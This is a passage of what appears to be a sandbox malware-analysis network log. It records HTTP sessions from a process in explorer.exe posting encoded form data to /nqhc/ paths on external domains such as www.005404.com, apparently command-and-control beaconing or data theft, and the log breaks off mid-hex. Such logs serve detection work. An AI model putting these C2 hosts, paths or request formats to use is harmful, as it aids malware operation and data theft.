VMCp4FrzmRb_wOIqUXgTX5Al4BGWayVHoYLt~WTT
                                                                                                                                                                                    Nov 21, 2022 19:21:32.237097979 CET850OUTData Raw: 30 44 65 51 50 59 62 4a 59 59 6d 66 44 6b 39 61 78 57 43 2d 71 65 67 41 35 4a 4b 58 35 4a 59 38 6c 53 70 32 6f 45 65 42 49 6b 6d 56 7e 4f 46 34 28 6c 6e 51 46 66 63 56 71 5a 6e 36 54 74 53 53 43 6f 75 75 42 74 59 37 44 35 47 61 41 6f 55 48 31 6d
                                                                                                                                                                                    Data Ascii: 0DeQPYbJYYmfDk9axWC-qegA5JKX5JY8lSp2oEeBIkmV~OF4(lnQFfcVqZn6TtSSCouuBtY7D5GaAoUH1ms0C423D3P70IuMWadszTFHdBTx0K~fuD1Axb2L6mUaa1pLdEkGF01yWdxlilYIIQh2GmGvwXooxBcig_~9VWT25n~xwAKoCjZ4tWXVFcUquxt4F8rNcTLK~9lrWi(_YbBQITwaEz1BaB1p2wMZWRPFJP9FpvwfAu0
                                                                                                                                                                                    Nov 21, 2022 19:21:32.265876055 CET850INHTTP/1.1 404 Not Found
                                                                                                                                                                                    Server: nginx
                                                                                                                                                                                    Date: Mon, 21 Nov 2022 18:21:32 GMT
                                                                                                                                                                                    Content-Type: text/html
                                                                                                                                                                                    Content-Length: 146
                                                                                                                                                                                    Connection: close
                                                                                                                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                    Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
                                                                                                                                                                                    Nov 21, 2022 19:21:32.266040087 CET856OUTData Raw: 66 51 44 70 53 51 68 79 4e 51 5a 37 71 44 66 39 55 76 66 34 57 62 46 55 34 68 39 6c 52 38 54 55 73 41 34 39 7a 78 6e 4c 78 50 43 6a 37 69 47 54 59 70 77 43 4c 48 31 52 6b 39 72 4d 6e 41 37 61 34 36 79 4f 42 34 4c 46 51 4c 42 75 36 4f 70 66 48 72
                                                                                                                                                                                    Data Ascii: fQDpSQhyNQZ7qDf9Uvf4WbFU4h9lR8TUsA49zxnLxPCj7iGTYpwCLH1Rk9rMnA7a46yOB4LFQLBu6OpfHroWILrGldM3y2LxFOhYjNfczvxtm9(wh6X838KKkhFnUynxIIjWKyYr5w19W7CkxzHBHPq_WQh7OBzfGs3GZTGDOK2iUzHRylxAHifkLpr1Qk3TKu2SfhAJy8hU4Ul69yPe0p1Ex-3oUKtjUBUsZy4DDlJaSd2Pv9T
                                                                                                                                                                                    Nov 21, 2022 19:21:32.266269922 CET858OUTData Raw: 63 6c 30 5f 48 44 32 70 74 36 5a 31 75 62 39 54 74 63 7e 61 6f 51 38 69 68 76 46 37 31 68 64 70 64 77 57 38 49 33 34 67 51 45 7a 2d 37 4d 67 6b 48 5f 4b 66 44 42 7a 5a 34 5a 33 39 42 78 76 65 48 5a 51 71 66 51 6a 72 6c 75 78 4d 37 72 69 58 42 6a
                                                                                                                                                                                    Data Ascii: cl0_HD2pt6Z1ub9Ttc~aoQ8ihvF71hdpdwW8I34gQEz-7MgkH_KfDBzZ4Z39BxveHZQqfQjrluxM7riXBjg4MtHtKwdCx-(Dw7lnnltbqaMlJ6oMuTbkLAh089m0nYrtRqRjsXSq9aQMW_h7TWSaBjUisECcC7vnhTtQs6yRjN12BPAq~YtO4w3T3QKzqI3FzYZBxpqUxsRxpt5SZIxnGjpE5IrIOLH7(js7tMpTHCb6nFcqEL8
                                                                                                                                                                                    Nov 21, 2022 19:21:32.266432047 CET861OUTData Raw: 33 75 68 45 71 47 5a 39 61 55 5a 4b 6e 67 52 4e 6a 6d 7e 69 54 30 75 6b 42 6f 33 46 50 41 52 6f 68 41 6e 6b 7a 68 41 38 55 6e 38 30 34 64 57 4c 55 50 62 54 39 70 47 6f 79 5f 38 37 52 56 7e 50 79 69 44 53 37 49 74 75 43 6e 38 38 71 6e 47 59 6d 32
                                                                                                                                                                                    Data Ascii: 3uhEqGZ9aUZKngRNjm~iT0ukBo3FPARohAnkzhA8Un804dWLUPbT9pGoy_87RV~PyiDS7ItuCn88qnGYm2lRXR9nfrqVHEqNl6sOCnlSSNN8x_mnbEyHP0Ow2Hw84-yXnAEZQIkCd7DPP1ZaeZSg7tTz8DIRMG6b2pg4XmlUARS-Ynr37RvnElAXczCTASL3RL6kkjni5xNkNYeT~_1_18v2I203ltAvNa3ewnu6yG5UyyoIcR1
                                                                                                                                                                                    Nov 21, 2022 19:21:32.266587973 CET867OUTData Raw: 68 66 38 68 43 70 51 72 7a 32 56 71 37 6d 28 58 58 65 63 4b 28 61 6c 31 64 58 72 7a 33 42 71 6d 31 41 6a 6d 69 47 42 4b 34 69 41 32 74 78 5a 42 4a 68 42 4b 4b 41 6a 53 63 78 73 39 59 34 50 67 41 6b 4b 32 55 50 72 53 68 46 59 56 50 74 52 6c 56 61
                                                                                                                                                                                    Data Ascii: hf8hCpQrz2Vq7m(XXecK(al1dXrz3Bqm1AjmiGBK4iA2txZBJhBKKAjScxs9Y4PgAkK2UPrShFYVPtRlVatiLCsCDbbCdPa63Fy4lWtB(751KjBpzTKLNkuhMwAbWrCky9ctIFzeAznB(HJdpQYS2aS4nOGkRYTIXWi8kW1Ky80n1hhiFVbrcVw76td2asQjBZ6najNk7wFTWoGCy34CH6FTIdHpBLHfPE6wwlnW0GdyHpCdct4
                                                                                                                                                                                    Nov 21, 2022 19:21:32.266762972 CET868OUTData Raw: 69 49 28 44 76 66 36 73 51 66 37 75 46 44 7e 4f 6d 2d 44 70 51 62 32 62 43 6a 6c 36 42 47 71 38 75 61 61 34 4f 55 7e 61 67 44 28 4a 6d 6d 6f 59 43 30 6c 50 38 31 49 35 71 70 68 77 6f 72 4c 31 41 59 34 62 39 62 7e 4d 54 53 6e 54 46 31 62 53 57 7a
                                                                                                                                                                                    Data Ascii: iI(Dvf6sQf7uFD~Om-DpQb2bCjl6BGq8uaa4OU~agD(JmmoYC0lP81I5qphworL1AY4b9b~MTSnTF1bSWzFx7_tBdpkArNxUtVbidL67AgnJ8rvcWf6k9k3srJYXNBWHf59Etc5GTgH8oIXOvpNf2_jjRzYd~G~ZO0ExoDsaJVckGHcqMnJjTp4OZJJjxQn63JMUnBzq6xpSod51Wft-FFJp0is05UgQDuEMjxYFT4RM3bfIsdE
                                                                                                                                                                                    Nov 21, 2022 19:21:32.266840935 CET871OUTData Raw: 7a 74 6e 46 48 41 36 42 74 52 76 48 74 65 30 5a 6d 65 4f 79 64 52 62 4e 39 41 51 78 42 59 4c 43 49 78 73 74 67 7a 46 39 5a 74 39 59 76 64 53 78 59 2d 37 33 4d 77 57 67 28 46 61 55 36 4a 42 38 70 67 6d 53 56 34 6c 64 32 30 71 71 61 39 6f 61 64 59
                                                                                                                                                                                    Data Ascii: ztnFHA6BtRvHte0ZmeOydRbN9AQxBYLCIxstgzF9Zt9YvdSxY-73MwWg(FaU6JB8pgmSV4ld20qqa9oadY(2Ohzq(c4LxtTIOeBQSqEE9Za2u5P3aQJLsU5GS2h4ZKp_Bg18pNGvd6Q9d6pk7N0G77sw46CUFNgcvyfTyW(3gXcUg8GsYm91YNRhE2bMsbVveCd6xgNVgMXrd-5yrOZCFztKNtcJkd1miUg09UTB6sDj(LfswNu
                                                                                                                                                                                    Nov 21, 2022 19:21:32.267007113 CET876OUTData Raw: 7a 63 75 51 53 70 7e 4a 30 6f 50 36 49 4a 43 37 6c 36 6c 62 4d 43 5a 48 42 31 77 34 63 51 42 66 65 50 34 5f 74 5f 56 50 75 6f 4b 48 28 31 39 70 68 54 6d 51 43 50 31 68 64 49 63 66 58 6e 65 4b 5a 44 37 30 28 5f 62 30 6a 54 34 57 4d 6e 4d 74 66 4b
                                                                                                                                                                                    Data Ascii: zcuQSp~J0oP6IJC7l6lbMCZHB1w4cQBfeP4_t_VPuoKH(19phTmQCP1hdIcfXneKZD70(_b0jT4WMnMtfKV0GiGQZ4P3rbHLdTA15CCWebKGkaVQKge26hg0lrNvppkk5YlnCw5lWxDfJ_sff6VhYKr7(kdzNo3RkLC-0e(J5zRfBJew0cqB8h5vepgYtXl2hRClmss-PhCTO4DazRrWQq03k_oL8WDHgKPIA41Wxw30Q8h5ZSZ
                                                                                                                                                                                    Nov 21, 2022 19:21:32.295433044 CET879OUTData Raw: 6e 32 46 75 51 4b 34 49 5a 2d 71 69 57 59 69 42 7e 35 4e 37 75 54 39 74 48 69 73 31 33 75 4f 5f 41 41 36 52 39 4e 28 67 67 76 74 5a 73 69 66 41 63 70 4e 45 51 59 4e 4c 4e 71 41 75 6d 4e 58 57 4c 37 54 57 6c 56 54 53 32 69 74 5f 4f 76 75 4a 7e 58
                                                                                                                                                                                    Data Ascii: n2FuQK4IZ-qiWYiB~5N7uT9tHis13uO_AA6R9N(ggvtZsifAcpNEQYNLNqAumNXWL7TWlVTS2it_OvuJ~XlXrzhz2i6x14x35ov_F2ucqmDOAjzpZlFrA31FHTIzp2DLVrrj1kAsvUkXpmD52MNUUJTDbNysOUqlMGlpnxUq~WcPrfT1oLq3uSopQ4t0SLU5K8rZROOVM4v3BDPL~buka060Jq~sl4ndEiJPtOWygqaht6GsNnR
                                                                                                                                                                                    Nov 21, 2022 19:21:32.295545101 CET888OUTData Raw: 4f 54 39 48 6d 61 7a 59 43 59 64 69 4d 59 6a 58 38 47 34 49 55 2d 57 64 51 31 73 41 56 59 68 51 5a 67 62 53 45 75 53 54 5a 38 7a 57 74 78 49 4a 6d 36 57 52 59 52 6c 67 45 36 4d 56 59 44 47 63 47 4b 71 4f 67 4d 4c 6e 78 31 47 6f 4a 63 28 64 51 61
                                                                                                                                                                                    Data Ascii: OT9HmazYCYdiMYjX8G4IU-WdQ1sAVYhQZgbSEuSTZ8zWtxIJm6WRYRlgE6MVYDGcGKqOgMLnx1GoJc(dQa1zovVDCjVsoT(zaNagOlmGKhTzmAPpai9038x3ChKqxb~K3VxQokQdEhprF_hHvMJHd74XnaYoPfFKBYiNkkfGAGg1bpVUQaGBX0Gr8aOo5c~0ph7L83nB1okE1AXsrwWFR_MxTMpHms4KQ6yfnSqGrLbsgUVw5Uz


                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                    26192.168.11.20498512.57.90.1680C:\Windows\explorer.exe
                                                                                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                                                                                    Nov 21, 2022 19:21:34.282839060 CET891OUTGET /nqhc/?r4txB=Jo9Ly5swECirkrz+Q2kB1mJjI2FdxMCd6ppqF2nJOFmXYuV8xeQe4DXLVR0s/AtaPMk93SVGZaQ/v2g/wIz4PNYN1ua2MlcQRg==&1b=S8jD HTTP/1.1
                                                                                                                                                                                    Host: www.botbillionsblaze.website
                                                                                                                                                                                    Connection: close
                                                                                                                                                                                    Data Raw: 00 00 00 00 00 00 00
                                                                                                                                                                                    Data Ascii:
                                                                                                                                                                                    Nov 21, 2022 19:21:34.312156916 CET891INHTTP/1.1 404 Not Found
                                                                                                                                                                                    Server: nginx
                                                                                                                                                                                    Date: Mon, 21 Nov 2022 18:21:34 GMT
                                                                                                                                                                                    Content-Type: text/html
                                                                                                                                                                                    Content-Length: 146
                                                                                                                                                                                    Connection: close
                                                                                                                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                    Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                    27192.168.11.2049852103.63.2.17580C:\Windows\explorer.exe
                                                                                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                                                                                    Nov 21, 2022 19:21:39.841573954 CET892OUTPOST /nqhc/ HTTP/1.1
                                                                                                                                                                                    Host: www.005404.com
                                                                                                                                                                                    Connection: close
                                                                                                                                                                                    Content-Length: 187
                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                    Origin: http://www.005404.com
                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                    Referer: http://www.005404.com/nqhc/
                                                                                                                                                                                    Accept-Language: en-US
                                                                                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                                                                                    Data Raw: 72 34 74 78 42 3d 44 77 6a 55 50 33 65 31 78 6c 31 59 58 46 49 31 6d 47 77 6a 77 76 57 45 28 71 69 64 73 79 31 47 77 59 61 71 57 4a 6b 78 73 5a 77 6e 55 58 79 4b 71 4f 43 6e 46 72 4d 51 70 52 4d 57 57 7a 7a 6a 73 71 49 4b 55 5a 49 71 4d 6d 47 44 51 4e 78 79 6e 67 4b 50 28 51 57 6b 4a 62 63 4f 6e 7a 54 63 36 79 70 38 69 4e 46 35 36 59 35 4f 7e 78 7e 4d 45 54 6b 5a 4a 77 46 66 4e 2d 6b 48 4a 33 37 63 41 49 50 71 51 54 66 4a 70 39 53 71 7a 51 4f 4b 7a 34 30 5f 53 65 6c 32 41 42 6f 70 61 46 77 72 4b 42 50 33 4f 57 61 49 67 39 66 74 78 50 42 53 79 51 29 2e 00 00 00 00 00 00 00 00
                                                                                                                                                                                    Data Ascii: r4txB=DwjUP3e1xl1YXFI1mGwjwvWE(qidsy1GwYaqWJkxsZwnUXyKqOCnFrMQpRMWWzzjsqIKUZIqMmGDQNxyngKP(QWkJbcOnzTc6yp8iNF56Y5O~x~METkZJwFfN-kHJ37cAIPqQTfJp9SqzQOKz40_Sel2ABopaFwrKBP3OWaIg9ftxPBSyQ).
                                                                                                                                                                                    Nov 21, 2022 19:21:40.016932964 CET894INHTTP/1.1 404 Not Found
                                                                                                                                                                                    Server: nginx
                                                                                                                                                                                    Date: Mon, 21 Nov 2022 18:21:39 GMT
                                                                                                                                                                                    Content-Type: text/html
                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                    Connection: close
                                                                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                                                                    ETag: W/"634bbb43-6cd"
                                                                                                                                                                                    Content-Encoding: gzip
                                                                                                                                                                                    Data Raw: 33 61 64 0d 0a 1f 8b 08 00 00 00 00 00 00 03 75 15 cb 6e dc 36 f0 9e af 60 59 d4 92 60 9b 92 d6 bb 89 bb 92 16 88 d3 06 08 10 b8 3d a4 a7 20 07 4a e2 4a 74 b8 a4 40 72 1f f2 62 bf a2 87 fe 42 cf 0d d0 63 3f 27 40 fe a2 43 49 eb 95 0d e7 a0 11 e7 3d c3 79 30 ad ed 4a 2c 5e a4 35 a3 e5 22 5d 31 4b 51 51 53 6d 98 cd f0 1f 1f de 5e 5e e3 70 91 5a 6e 05 5b 4c a3 29 ba 55 16 bd 55 6b 59 a6 61 4f 4c 4d a1 79 63 17 7c e9 4b ba e1 15 b5 4a 93 b5 61 fa 75 c5 a4 25 56 bd 57 05 15 ec bd da 32 fd 86 1a e6 07 84 cb 92 ed 7e 5b fa 38 a7 bc 5c e3 00 65 19 ba 8c 83 7d a9 8a f5 aa 53 72 ee 50 86 bf fe f7 e5 db 5f 7f 7f fb f3 df af ff 7c c1 87 34 1c 5c a5 82 cb cf 48 33 91 61 5e 28 89 91 6d 1b 06 e7 15 ad 58 b8 bb ec 69 b5 66 cb 0c d7 d6 36 f3 30 9c ce 48 3c 99 90 f8 ea 9a 4c 67 e1 12 e2 04 3d 02 00 2f 8e f1 3f 38 df 6a 6e 99 90 be e7 05 c9 86 6a 64 4c e6 a5 25 df 20 5e 66 d8 d4 6a 5b 08 25 99 a9 99 ac 76 9c 3a f7 c6 b6 02 fc d7 8c 57 b5 9d a3 38 8a 7e 4a d0 96 97 b6 3e 22 39 2d 3e 57 da 5d db 65 a1 84 d2 73 a4 ab dc 9f cc 66 17 e8 08 82 04 8d a4 1a 65 b8 e5 4a ce 11 97 70 a0 e2 f8 7f 24 a5 59 c3 28 78 7c 2a 03 59 f1 a5 a6 2b 86 e0 c6 94 80 eb aa 32 dc 32 83 d1 8a ea 8a cb 3e d2 2c 1a d0 2e 54 c0 50 a7 93 2b 5d 32 9d e1 08 f7 39 64 d8 25 74 42 a6 11 70 06 0b 03 cb e8 22 c3 67 3f c6 d1 34 01 18 bf 1c c1 09 9c 67 d7 00 a6 af 8e 60 d6 d1 ae 1c ea 24 a7 3f 3b 34 3a 82 11 2d 76 b4 4e c4 81 91 da ab 04 32 0c fb 14 e1 00 c5 81 32 ba 22 0c 9d 60 d9 ce 86 85 31 78 e1 9a 7b df 97 a2 2b cb 50 23 77 3e e4 aa 6c d1 77 98 89 da 30 bd 14 6a 3b af 79 59 32 e9 9a cf 39 58 78 09 db 50 e1 e3 c7 ed e2 7b f8 dc 98 73 0c 2d 83 83 c4 ea 76 0f f3 f3 4e 5a a6 9d f0 72 2d 0b 57 4c 3f d8 3b d6 83 6a c5 ec af 82 b9 8e bf 69 df 95 60 93 6f 5e 0b 81 03 d2 b9 22 25 37 8d a0 6d 86 25 f4 1b 3e 14 d4 16 b5 cf 82 fd 61 a9 b4 ef 3a 93 67 51 c2 d3 07 73 2e 1f 52 d4 5c 94 9a 49 22 a0 3f 6d 9d f0 f3 f3 de ab 53 b0 b4 92 50 e1 ec 79 95 8f fc 13 01 89 5b 90 e8 1a 7f d5 42 c7 7f 5f 94 97 09 cc bc 13 fa a1 9f c3 5f f8 26 c6 67 67 03 e5 b9 49 19 8d f8 a3 60 9d e7 67 73 1e 25 7d 38 5c 40 d5 82 11 e5 b4 0f 86 bd 30 be 68 97 40 de 9c c2 2f 34 4c 0a 1b ae db f7 7a 8d 61 c2 8b b5 fe 5d 2b ab 60 34 b3 2d 2c 27 b5 25 02 96 96 2b 19 69 06 06 81 5a 70 eb 7b 73 2f f8 18 7d 72 99 8f b5 b2 cc 73 9b c6 78 c1 3e 6f 88 1b 87 1e 87 d5 73 7f 4f f2 d2 58 b0 56 90 42 ad 42 b7 bb cc 3a 5f 71 1b 36 6b 53 93 3b e3 25 07 26 0c 7b a4 09 8a 1d f7 be a6 d2 7d 15 e9 76 65 67 e1 a4 d6 ad a7 53 8e a7 7e 32 37 ed 87 be 92 3e ee 53 c5 5d d8 86 34 14 9a c3 de aa 92 c1 1a 86 2d 6d 6f 18 b4 13 f3 f3 e6 c2 04 c9 21 f0 83 e4 e9 bd 8e 87 ea 8e 6e e8 60 10 75 53 df a5 0d d1 de 99 6e e9 1b 32 8b 89 a0 e1 24 9e be 8c 67 57 31 a4 e7 46 f5 b8 b8 c3 ee 95 79 91 ba ea c3 af 80 50 98 5e a4 75 fc f4 6d 01 4a 1a 0e 6c 78 9b 40 66 40 24 ac af dd 88 15 0e a6 c2 ee 19 fb 1f 05 e9 27 15 cd 06 00 00 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                    Data Ascii: 3adun6`Y`= JJt@rbBc?'@CI=y0J,^5"]1KQQSm^^pZn[L)UUkYaOLMyc|KJau%VW2~[8\e}SrP_|4\H3a^(mXif60H<Lg=/?8jnjdL% ^fj[%v:W8~J>"9->W]esfeJp$Y(x|*Y+22>,.TP+]29d%tBp"g?4g`$?;4:-vN22"`1x{+P#w>lw0j;yY29XxP{s-vNZr-WL?;ji`o^"%7m%>a:gQs.R\I"?mSPy[B__&ggI`gs%}8\@0h@/4Lza]+`4-,'%+iZp{s/}rsx>osOXVBB:_q6kS;%&{}vegS~27>S]4-mo!n`uSn2$gW1FyP^umJlx@f@$'0


                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                    28192.168.11.2049853103.63.2.17580C:\Windows\explorer.exe
                                                                                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                                                                                    Nov 21, 2022 19:21:42.050671101 CET895OUTPOST /nqhc/ HTTP/1.1
                                                                                                                                                                                    Host: www.005404.com
                                                                                                                                                                                    Connection: close
                                                                                                                                                                                    Content-Length: 527
                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                    Origin: http://www.005404.com
                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                    Referer: http://www.005404.com/nqhc/
                                                                                                                                                                                    Accept-Language: en-US
                                                                                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                                                                                    Data Raw: 72 34 74 78 42 3d 44 77 6a 55 50 33 65 31 78 6c 31 59 56 6c 59 31 32 56 59 6a 79 50 57 48 36 71 69 64 6d 53 30 4e 77 59 57 71 57 4e 39 38 73 73 6f 6e 58 79 4f 4b 34 61 75 6e 45 72 4d 51 6e 78 4d 58 53 7a 79 68 73 71 31 71 55 63 6f 71 4d 6d 43 44 57 34 6c 79 77 67 4b 51 78 77 57 6e 66 72 63 4c 74 54 53 64 36 79 74 61 69 50 35 35 37 70 56 4f 28 7a 6d 4d 41 47 51 65 44 77 45 61 47 65 6b 41 48 58 37 53 41 49 79 66 51 58 54 7a 70 49 53 71 32 41 75 4b 68 49 30 38 59 75 6c 39 4e 68 70 4c 58 46 55 6e 4b 42 6e 4b 5a 6c 37 31 6b 2d 71 65 77 66 4d 4e 71 41 37 71 49 66 37 6c 39 39 4c 5f 68 50 68 30 4b 51 28 55 62 42 4f 6a 50 74 7a 76 5a 34 6d 42 55 48 49 54 68 36 38 72 50 68 59 4e 33 52 5a 78 54 6d 28 56 30 78 78 43 4f 35 41 56 4c 63 4b 79 70 33 4a 71 39 79 45 30 53 48 35 4e 43 4f 51 5f 61 69 34 38 56 4b 6d 4b 32 34 7e 6e 61 43 50 35 4b 57 55 52 74 35 66 43 4b 51 4d 2d 53 45 58 6a 35 72 33 4b 67 70 72 6c 55 66 28 45 66 36 45 5a 6e 70 6d 66 58 37 73 79 48 78 59 53 50 43 57 2d 51 58 46 73 36 38 72 47 79 62 68 43 72 6a 72 56 6a 4f 4b 63 49 4c 33 33 56 35 52 5a 74 50 39 72 4b 31 6e 50 50 32 69 49 79 61 72 6f 42 53 58 72 75 4d 4f 6a 66 42 73 56 4e 47 6a 43 6e 63 6e 61 31 72 45 6a 79 45 58 43 73 47 57 47 73 6d 74 36 38 58 63 56 30 63 4e 37 66 30 4c 75 50 52 62 66 38 58 35 65 51 45 69 6b 56 48 58 55 34 36 44 39 6d 4c 4a 4b 48 39 74 32 51 4e 6f 75 4c 46 41 6f 32 57 78 6f 66 46 47 6f 4f 5f 37 4b 45 32 41 73 30 66 67 58 34 33 6f 6f 4a 58 49 77 74 48 70 56 50 5f 59 32 46 6c 7a 71 59 49 45 76 6c 6b 36 73 47 31 30 46 43 76 5a 6c 79 41 63 49 4c 46 70 58 44 6c 74 47 32 37 45 2e 00 00 00 00 00 00 00 00
                                                                                                                                                                                    Data Ascii: r4txB=DwjUP3e1xl1YVlY12VYjyPWH6qidmS0NwYWqWN98ssonXyOK4aunErMQnxMXSzyhsq1qUcoqMmCDW4lywgKQxwWnfrcLtTSd6ytaiP557pVO(zmMAGQeDwEaGekAHX7SAIyfQXTzpISq2AuKhI08Yul9NhpLXFUnKBnKZl71k-qewfMNqA7qIf7l99L_hPh0KQ(UbBOjPtzvZ4mBUHITh68rPhYN3RZxTm(V0xxCO5AVLcKyp3Jq9yE0SH5NCOQ_ai48VKmK24~naCP5KWURt5fCKQM-SEXj5r3KgprlUf(Ef6EZnpmfX7syHxYSPCW-QXFs68rGybhCrjrVjOKcIL33V5RZtP9rK1nPP2iIyaroBSXruMOjfBsVNGjCncna1rEjyEXCsGWGsmt68XcV0cN7f0LuPRbf8X5eQEikVHXU46D9mLJKH9t2QNouLFAo2WxofFGoO_7KE2As0fgX43ooJXIwtHpVP_Y2FlzqYIEvlk6sG10FCvZlyAcILFpXDltG27E.
                                                                                                                                                                                    Nov 21, 2022 19:21:42.239716053 CET896INHTTP/1.1 404 Not Found
                                                                                                                                                                                    Server: nginx
                                                                                                                                                                                    Date: Mon, 21 Nov 2022 18:21:42 GMT
                                                                                                                                                                                    Content-Type: text/html
                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                    Connection: close
                                                                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                                                                    ETag: W/"634bbb43-6cd"
                                                                                                                                                                                    Content-Encoding: gzip
                                                                                                                                                                                    Data Raw: 33 61 64 0d 0a 1f 8b 08 00 00 00 00 00 00 03 75 15 cb 6e dc 36 f0 9e af 60 59 d4 92 60 9b 92 d6 bb 89 bb 92 16 88 d3 06 08 10 b8 3d a4 a7 20 07 4a e2 4a 74 b8 a4 40 72 1f f2 62 bf a2 87 fe 42 cf 0d d0 63 3f 27 40 fe a2 43 49 eb 95 0d e7 a0 11 e7 3d c3 79 30 ad ed 4a 2c 5e a4 35 a3 e5 22 5d 31 4b 51 51 53 6d 98 cd f0 1f 1f de 5e 5e e3 70 91 5a 6e 05 5b 4c a3 29 ba 55 16 bd 55 6b 59 a6 61 4f 4c 4d a1 79 63 17 7c e9 4b ba e1 15 b5 4a 93 b5 61 fa 75 c5 a4 25 56 bd 57 05 15 ec bd da 32 fd 86 1a e6 07 84 cb 92 ed 7e 5b fa 38 a7 bc 5c e3 00 65 19 ba 8c 83 7d a9 8a f5 aa 53 72 ee 50 86 bf fe f7 e5 db 5f 7f 7f fb f3 df af ff 7c c1 87 34 1c 5c a5 82 cb cf 48 33 91 61 5e 28 89 91 6d 1b 06 e7 15 ad 58 b8 bb ec 69 b5 66 cb 0c d7 d6 36 f3 30 9c ce 48 3c 99 90 f8 ea 9a 4c 67 e1 12 e2 04 3d 02 00 2f 8e f1 3f 38 df 6a 6e 99 90 be e7 05 c9 86 6a 64 4c e6 a5 25 df 20 5e 66 d8 d4 6a 5b 08 25 99 a9 99 ac 76 9c 3a f7 c6 b6 02 fc d7 8c 57 b5 9d a3 38 8a 7e 4a d0 96 97 b6 3e 22 39 2d 3e 57 da 5d db 65 a1 84 d2 73 a4 ab dc 9f cc 66 17 e8 08 82 04 8d a4 1a 65 b8 e5 4a ce 11 97 70 a0 e2 f8 7f 24 a5 59 c3 28 78 7c 2a 03 59 f1 a5 a6 2b 86 e0 c6 94 80 eb aa 32 dc 32 83 d1 8a ea 8a cb 3e d2 2c 1a d0 2e 54 c0 50 a7 93 2b 5d 32 9d e1 08 f7 39 64 d8 25 74 42 a6 11 70 06 0b 03 cb e8 22 c3 67 3f c6 d1 34 01 18 bf 1c c1 09 9c 67 d7 00 a6 af 8e 60 d6 d1 ae 1c ea 24 a7 3f 3b 34 3a 82 11 2d 76 b4 4e c4 81 91 da ab 04 32 0c fb 14 e1 00 c5 81 32 ba 22 0c 9d 60 d9 ce 86 85 31 78 e1 9a 7b df 97 a2 2b cb 50 23 77 3e e4 aa 6c d1 77 98 89 da 30 bd 14 6a 3b af 79 59 32 e9 9a cf 39 58 78 09 db 50 e1 e3 c7 ed e2 7b f8 dc 98 73 0c 2d 83 83 c4 ea 76 0f f3 f3 4e 5a a6 9d f0 72 2d 0b 57 4c 3f d8 3b d6 83 6a c5 ec af 82 b9 8e bf 69 df 95 60 93 6f 5e 0b 81 03 d2 b9 22 25 37 8d a0 6d 86 25 f4 1b 3e 14 d4 16 b5 cf 82 fd 61 a9 b4 ef 3a 93 67 51 c2 d3 07 73 2e 1f 52 d4 5c 94 9a 49 22 a0 3f 6d 9d f0 f3 f3 de ab 53 b0 b4 92 50 e1 ec 79 95 8f fc 13 01 89 5b 90 e8 1a 7f d5 42 c7 7f 5f 94 97 09 cc bc 13 fa a1 9f c3 5f f8 26 c6 67 67 03 e5 b9 49 19 8d f8 a3 60 9d e7 67 73 1e 25 7d 38 5c 40 d5 82 11 e5 b4 0f 86 bd 30 be 68 97 40 de 9c c2 2f 34 4c 0a 1b ae db f7 7a 8d 61 c2 8b b5 fe 5d 2b ab 60 34 b3 2d 2c 27 b5 25 02 96 96 2b 19 69 06 06 81 5a 70 eb 7b 73 2f f8 18 7d 72 99 8f b5 b2 cc 73 9b c6 78 c1 3e 6f 88 1b 87 1e 87 d5 73 7f 4f f2 d2 58 b0 56 90 42 ad 42 b7 bb cc 3a 5f 71 1b 36 6b 53 93 3b e3 25 07 26 0c 7b a4 09 8a 1d f7 be a6 d2 7d 15 e9 76 65 